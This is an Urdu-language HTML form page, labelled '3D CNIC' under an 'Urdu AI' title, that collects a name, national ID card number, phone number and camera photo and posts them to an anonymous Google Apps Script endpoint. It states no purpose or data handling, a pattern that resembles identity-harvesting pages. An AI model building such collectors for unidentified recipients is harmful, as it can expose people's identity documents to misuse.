
<!DOCTYPE html>
<html lang="ur" dir="rtl">
<head>
  <meta charset="UTF-8" />
  <title>اردو اے آئی - 3D CNIC فارم</title>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Noto+Naskh+Arabic&display=swap');

    body {
      font-family: 'Noto Naskh Arabic', serif;
      margin: 0;
      padding: 0;
      background: linear-gradient(135deg, #0f2027, #203a43, #2c5364);
      min-height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
    }

    .form-container {
      background: rgba(255, 255, 255, 0.1);
      backdrop-filter: blur(15px);
      -webkit-backdrop-filter: blur(15px);
      border: 1px solid rgba(255, 255, 255, 0.2);
      border-radius: 20px;
      padding: 30px;
      width: 90%;
      max-width: 400px;
      box-shadow: 0 15px 35px rgba(0, 0, 0, 0.5);
      color: white;
    }

    h2 {
      text-align: center;
      margin-bottom: 20px;
      font-weight: bold;
      font-size: 1.8rem;
      color: #ffffff;
    }

    label {
      margin-top: 15px;
      display: block;
      font-size: 1rem;
    }

    input {
      width: 100%;
      padding: 10px;
      margin-top: 5px;
      border-radius: 8px;
      border: none;
      outline: none;
      font-size: 1rem;
      margin-bottom: 15px;
      background: rgba(255,255,255,0.2);
      color: white;
    }

    input::placeholder {
      color: #ddd;
    }

    button {
      width: 100%;
      padding: 12px;
      background: linear-gradient(135deg, #43cea2, #185a9d);
      color: white;
      border: none;
      border-radius: 10px;
      font-size: 1.1rem;
      font-weight: bold;
      cursor: pointer;
      transition: 0.4s ease;
      box-shadow: 0 8px 25px rgba(0, 255, 255, 0.2);
    }

    button:hover {
      background: linear-gradient(135deg, #ff512f, #dd2476);
      transform: scale(1.03);
      box-shadow: 0 8px 35px rgba(255, 255, 255, 0.3);
    }

    @media (max-width: 500px) {
      .form-container {
        padding: 20px;
      }
    }
  </style>
</head>
<body>
  <div class="form-container">
    <h2>3D CNIC فارم</h2>
    <form id="cnicForm">
      <label>نام:</label>
      <input type="text" name="name" placeholder="مثال: احمد علی" required />
      <label>شناختی کارڈ نمبر:</label>
      <input type="text" name="cnic" placeholder="xxxxx-xxxxxxx-x" required />
      <label>فون نمبر:</label>
      <input type="text" name="phone" placeholder="0300xxxxxxx" required />
      <label>تصویر اپ لوڈ کریں:</label>
      <input type="file" name="photo" accept="image/*" capture="environment" required />
      <button type="submit">جمع کریں</button>
    </form>
  </div>

  <script>
    document.getElementById("cnicForm").addEventListener("submit", async function(e) {
      e.preventDefault();
      const form = e.target;
      const data = new FormData(form);

      const response = await fetch("https://script.google.com/macros/s/AKfycbzajw8UOCdpiUgCyPvwKvErgazn9kPvhdziLnv-qoh3iJWnnzD4djNHoLNxgXs7ID-_/exec", {
        method: "POST",
        body: data
      });

      if (response.ok) {
        alert("🎉 معلومات کامیابی سے جمع ہو گئیں!");
        form.reset();
      } else {
        alert("⚠️ کوئی غلطی ہوئی، دوبارہ کوشش کریں");
      }
    });
  </script>
</body>
</html>
